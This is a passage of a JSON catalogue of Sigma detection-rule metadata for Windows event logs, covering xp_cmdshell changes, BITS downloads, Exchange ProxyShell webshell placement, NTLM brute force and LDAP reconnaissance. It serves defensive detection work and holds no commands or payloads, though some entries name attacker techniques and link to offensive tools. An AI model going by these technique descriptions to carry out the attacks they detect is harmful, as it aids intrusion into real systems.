XPCmdshell Option Change", - "meta": { - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/12", - "filename": "win_mssql_xp_cmdshell_change.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "value": "Atera Agent Installation", - "meta": { - "refs": [ - "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" - ], - "tags": [ - "attack.t1219" - ], - "creation_date": "2021/09/01", - "filename": "win_software_atera_rmm_agent_install.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Legitimate Atera agent installation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects backup catalog deletions", - "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", - "value": "Backup Catalog Deleted", - "meta": { - "refs": [ - "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", - 
"https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2017/05/12", - "filename": "win_susp_backup_delete.yml", - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "uuid": "6c82cf5c-090d-4d57-9188-533577631108", - "value": "Microsoft Malware Protection Engine Crash", - "meta": { - "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", - "https://technet.microsoft.com/en-us/library/security/4022344", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" - ], - "creation_date": "2017/05/09", - "filename": "win_susp_msmpeng_crash.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "MsMpEng.exe can crash when C:\\ is full" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", - "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", - "value": "CVE-2020-0688 Exploitation via Eventlog", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/02/29", - "filename": "win_vul_cve_2020_0688.yml", - "author": "Florian Roth, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", - "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "meta": { - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/11/22", - "filename": "win_vul_cve_2021_41379.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other MSI packages for which your admins have used that name" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. 
You need configure applocker and log collect to receive these events.", - "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "value": "File Was Not Allowed To Run", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", - "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" - ], - "creation_date": "2020/06/28", - "filename": "win_applocker_file_was_not_allowed_to_run.yml", - "author": "Pushkarev Dmitry", - "level": "medium", - "falsepositive": [ - "Need tuning applocker or add exceptions in SIEM" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", - "value": "Suspicious Download with BITS from Suspicious TLD", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/06/28", - "filename": "win_bits_client_susp_domain.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "value": "Suspicious Download File Extension with BITS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/03/01", - "filename": "win_bits_client_susp_local_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No 
established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "value": "Download with BITS to Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/06/28", - "filename": "win_bits_client_susp_local_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "value": "Suspicious Task Added by Powershell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/03/01", - "filename": 
"win_bits_client_susp_powershell_job.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", - "value": "Suspicious Task Added by Bitsadmin", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/03/01", - "filename": "win_bits_client_susp_use_bitsadmin.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "value": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2022/06/10", - "filename": "win_bits_client_uncommon_domain.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Other legitimate domains used by software updaters" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", - "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "value": "Code Integrity Attempted DLL Load", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1483810148602814466", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/01/20", - "filename": "win_codeintegrity_attempted_dll_load.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Antivirus products" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects blocked load attempts of revoked drivers", - "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "value": "Block Load Of Revoked Driver", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/11/10", - "filename": "win_codeintegrity_revoked_driver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "value": "Code Integrity Blocked Driver Load", - "meta": { - "refs": [ - 
"https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/11/10", - "filename": "win_codeintergiry_blocked_driver_load.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "value": "Loading Diagcab Package From Remote Path", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1539679555908141061", - "https://twitter.com/j00sean/status/1537750439701225472", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/14", - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate package hosted on a known and authorized remote location" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "value": "GALLIUM Artefacts - Builtin", - "meta": { - "refs": [ - 
"https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2020/02/07", - "filename": "win_apt_gallium.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", - "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "meta": { - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", - "https://twitter.com/gentilkiwi/status/861641945944391680", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2017/05/08", - "filename": "win_susp_dns_config.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects plugged USB devices", - "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "value": "USB Device Plugged", - "meta": { - "refs": [ - "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", - "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1200" - ], - "creation_date": "2017/11/09", - "filename": "win_usb_device_plugged.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A rule has been modified in the Windows Firewall exception list", - "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", - "value": "Added Rule in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_add_rule.yml", - "author": "frack113", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A rule has been modified in the Windows Firewall exception list", - "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", - "value": "Modified Rule in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_change_rule.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - 
} - }, - { - "description": "A rule has been deleted in the Windows Firewall exception list.", - "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "value": "Delete Rule in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_delete_rule.yml", - "author": "frack113", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The Windows Firewall service failed to load Group Policy.", - "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", - "value": "Failed to Load Policy in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_failed.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Windows Firewall has been reset to its default configuration.", - "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", - "value": "Reset to Default Configuration Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_reset.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Setting have been change in Windows Firewall", - "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", - "value": "Setting Change in Windows Firewall with Advanced Security", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "win_firewall_as_setting_change.yml", - "author": "frack113", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible Active Directory enumeration via LDAP", - "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", - "value": "LDAP Reconnaissance / Active Directory Enumeration", - "meta": { - "refs": [ - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", - "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" - ], - 
"creation_date": "2021/06/22", - "filename": "win_ldap_recon.yml", - "author": "Adeem Mawani", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", - "value": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210" - ], - "creation_date": "2021/11/18", - "filename": "win_exchange_cve_2021_42321.yml", - "author": "Florian Roth, @testanull", - "level": "high", - "falsepositive": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", - "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", - "value": "ProxyLogon MSExchange OabVirtualDirectory", - "meta": { - "refs": [ - "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ], - "creation_date": "2021/08/09", - "filename": "win_exchange_proxylogon_oabvirtualdir.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", - "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", - "value": "Certificate Request Export to Exchange Webserver", - "meta": { - "refs": [ - "https://twitter.com/GossiTheDog/status/1429175908905127938", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/08/23", - "filename": "win_exchange_proxyshell_certificate_generation.yml", - "author": "Max Altgelt", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", - "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", - "value": "Mailbox Export to Exchange Webserver", - "meta": { - "refs": [ - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/08/09", - "filename": "win_exchange_proxyshell_mailbox_export.yml", - "author": "Florian Roth, Rich Warren, Christian Burkard", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", - "value": "Remove Exported 
Mailbox from Exchange Webserver", - "meta": { - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2021/08/27", - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", - "value": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "meta": { - "refs": [ - "https://twitter.com/OTR_Community/status/1371053369071132675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/03/15", - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", - "author": "Jose Rodriguez @Cyb3rPandaH", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Installation of a Exchange Transport Agent", - "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", - "value": "MSExchange Transport Agent Installation - Builtin", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" - ], - "tags": [ - "attack.persistence", - 
"attack.t1505.002" - ], - "creation_date": "2021/06/08", - "filename": "win_exchange_transportagent.yml", - "author": "Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a failed installation of a Exchange Transport Agent", - "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "value": "Failed MSExchange Transport Agent Installation", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], - "creation_date": "2021/06/08", - "filename": "win_exchange_transportagent_failed.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", - "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "value": "NTLM Logon", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/1004895028995477505", - "https://goo.gl/PsqrhT", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "creation_date": "2018/06/08", - "filename": "win_susp_ntlm_auth.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Legacy hosts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects common NTLM brute force device names", - "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "value": "NTLM Brute Force", - "meta": { - "refs": [ - "https://www.varonis.com/blog/investigate-ntlm-brute-force", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/02/02", - "filename": "win_susp_ntlm_brute_force.yml", - "author": "Jerry Shockley '@jsh0x'", - "level": "medium", - "falsepositive": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "value": "Potential Remote Desktop Connection to Non-Domain Host", - "meta": { - "refs": [ - "n/a", - 